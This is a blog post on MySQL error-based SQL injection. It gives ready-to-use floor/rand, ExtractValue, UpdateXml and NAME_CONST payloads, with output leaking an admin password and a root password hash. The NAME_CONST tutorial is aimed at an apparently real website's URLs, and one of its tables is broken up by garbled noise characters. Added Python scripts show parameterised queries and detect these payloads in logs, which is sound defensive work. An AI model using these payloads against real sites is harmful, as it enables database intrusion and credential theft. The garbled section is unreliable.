
MySQL error-based injection: exploiting the floor, ExtractValue and UpdateXml error modes

Posted 2015-11-11 19:03:37

1. Error-based injection via floor

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the error message. To extract other data, replace version() with the desired subquery.
For example, to retrieve the administrator's username and password:

Method1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id = 1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
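All three methods above depend on the same application defect: the id value is pasted into the statement text, so `and (select ...)`, `and extractvalue(...)` and `and 1=(updatexml(...))` reach the SQL parser as code. The following Python script is an added example, not part of the original post: it places the vulnerable concatenation next to the hardened type-check-plus-bind form. It uses SQLite in memory as a stand-in for MySQL (an assumption made so it runs offline; SQLite has no extractvalue(), so the injected call fails at parse time instead of leaking data, but it still reaches the parser, which is the point). The table contents mirror the post; the `make_db`, `lookup_unsafe`, `lookup_safe` and `outcome` names are constructed for the example.

```python
import sqlite3

# Constructed: the ExtractValue payload from this post, exactly as a request
# parameter would carry it.
INJECTED_ID = "1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)))"


def make_db():
    """Build the `article` table shown in the post, in memory (SQLite stands in for MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table article (id integer primary key, title text, content text)")
    conn.execute("insert into article values (1, 'test', 'do it')")
    conn.commit()
    return conn


def lookup_unsafe(conn, user_input):
    """Vulnerable form: the parameter is concatenated into the statement text,
    so whatever it contains is parsed as SQL."""
    sql = "select * from article where id = " + user_input
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_input):
    """Hardened form: validate the type, then bind the value as a parameter.

    int() rejects anything that is not an integer literal, and the placeholder keeps
    the value out of the SQL grammar even if the validation were loosened later.
    """
    article_id = int(user_input)  # raises ValueError on "1 and extractvalue(...)"
    return conn.execute("select * from article where id = ?", (article_id,)).fetchall()


def outcome(lookup, conn, user_input):
    """Run a lookup and report ('rows', result) or ('error', exception class name)."""
    try:
        return ("rows", lookup(conn, user_input))
    except (sqlite3.Error, ValueError) as exc:
        return ("error", type(exc).__name__)


if __name__ == "__main__":
    db = make_db()
    for label, lookup in (("unsafe", lookup_unsafe), ("safe", lookup_safe)):
        for value in ("1", INJECTED_ID):
            print(f"{label:6} {value[:40]!r:45} -> {outcome(lookup, db, value)}")
```

With the injected value, the unsafe lookup raises a database error (the injected function call was parsed, which on MySQL is exactly the error channel the post uses), while the safe lookup fails input validation before any SQL runs and returns the row only for a genuine integer id.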



Further collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection on newer MySQL versions: using NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

5 F$ }3 ~& X6 c( e, d3 f
3 e8 c6 v/ w; W6 s
# m5 [0 V- \# W5 L6 W& V6 q4 ||---------------|
; k) a4 L* ]9 F|     TEST      |& R6 o! e0 n) i5 T, i
|               |# ^% _! i6 _' {; R7 V
|---------------|4 z9 ~8 F7 w3 ?* o: I$ T
|       1       |" m+ \$ ?4 ~' J: @7 t
|               |& ^# _9 }- i6 Y
|---------------|
0 V+ ]+ i9 @. }. d4 w

; m5 L7 h/ c) w$ ~. N% l3 L  F0 G3 S  @

5 h9 ]- E9 S; i! L2 D3 h# m5 B6 ~
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'


Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'


Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here, if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage


Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'


Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
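Both halves of this post, the floor/ExtractValue/UpdateXml section and the NAME_CONST tutorial, leave two kinds of evidence a defender can look for: the function names in the request parameters, and the specific MySQL error texts (`Duplicate entry ... for key 'group_key'`, `XPATH syntax error`, `Duplicate column name`) that only show up in application logs when database errors are being surfaced to the client, which is the leak channel itself. The following Python script is an added example, not from the post or the tutorial it quotes: it normalises URL-encoded parameters (including the `+`-encoded payloads above), classifies them by technique, and separately classifies logged error messages. The access-log lines and the error list are constructed sample data built from the payloads on this page; the function and dictionary names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures for the four techniques on this page. Every regex in a
# list must match: the floor technique needs both floor(rand( and GROUP BY, and the
# post shows them in either order.
REQUEST_SIGNATURES = {
    name: [re.compile(p) for p in pats]
    for name, pats in {
        "floor_rand_groupby": [r"floor\s*\(\s*rand\s*\(", r"\bgroup\s+by\b"],
        "extractvalue": [r"\bextractvalue\s*\("],
        "updatexml": [r"\bupdatexml\s*\("],
        "name_const": [r"\bname_const\s*\("],
    }.items()
}

# Server-side signatures: the MySQL error texts these techniques provoke.
ERROR_SIGNATURES = {
    "floor_rand_groupby": re.compile(r"duplicate entry '.*' for key 'group_key'"),
    "xpath_functions": re.compile(r"xpath syntax error"),  # extractvalue and updatexml
    "name_const": re.compile(r"duplicate column name"),
}


def normalize(value):
    """URL-decode (%xx and '+', which the post's payloads use for spaces),
    lower-case and collapse whitespace so spacing variations still match."""
    return re.sub(r"\s+", " ", unquote_plus(value).lower())


def classify_request(query_string):
    """Names of the techniques whose signature appears in a URL or query string."""
    text = normalize(query_string)
    return sorted(name for name, rxs in REQUEST_SIGNATURES.items()
                  if all(rx.search(text) for rx in rxs))


def classify_error(message):
    """Names of the techniques consistent with a logged MySQL error message."""
    text = message.lower()
    return sorted(name for name, rx in ERROR_SIGNATURES.items() if rx.search(text))


def scan_access_log(lines):
    """Return [(line_no, techniques)] for request lines whose URL carries a signature."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if m:
            found = classify_request(m.group(1))
            if found:
                hits.append((n, found))
    return hits


# Constructed sample access-log lines (not from the post); the payloads are the ones
# shown on this page, URL-encoded the way a web server would record them.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [11/Nov/2015:19:03:37 +0800] "GET /detail.php?id=330&sid=19&cid=261 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [11/Nov/2015:19:03:41 +0800] "GET /detail.php?id=1+and+extractvalue(1,concat(0x5c,(select+pass+from+admin+limit+1))) HTTP/1.1" 500 312',
    '203.0.113.5 - - [11/Nov/2015:19:03:45 +0800] "GET /detail.php?id=1%20and%20(select%20count(*)%20from%20(select%201%20union%20select%20null%20union%20select%20!1)x%20group%20by%20concat((select%20pass%20from%20admin%20limit%201),floor(rand(0)*2))) HTTP/1.1" 500 330',
    '203.0.113.5 - - [11/Nov/2015:19:03:49 +0800] "GET /detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 290',
]

# Constructed sample error-log entries; the first three are the error texts shown on
# this page, the last is an unrelated error that must not match.
SAMPLE_DB_ERRORS = [
    "ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'",
    "ERROR 1105 (HY000): XPATH syntax error: '\\admin888'",
    "Error: Duplicate column name '5.0.27-community-nt'",
    "ERROR 1146 (42S02): Table 'shop.orders' doesn't exist",
]

if __name__ == "__main__":
    for n, found in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"access log line {n}: {', '.join(found)}")
    for msg in SAMPLE_DB_ERRORS:
        print(f"{msg[:50]!r:55} -> {classify_error(msg) or 'no match'}")
```

The request-side check is a cheap first filter for a WAF rule or a log-review job; the error-side check is the more reliable signal, because a `group_key` duplicate or an XPATH syntax error in an application that never calls those functions means both that injection is being attempted and that the application is echoing database errors, which is the configuration fix to make alongside parameterising the query.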
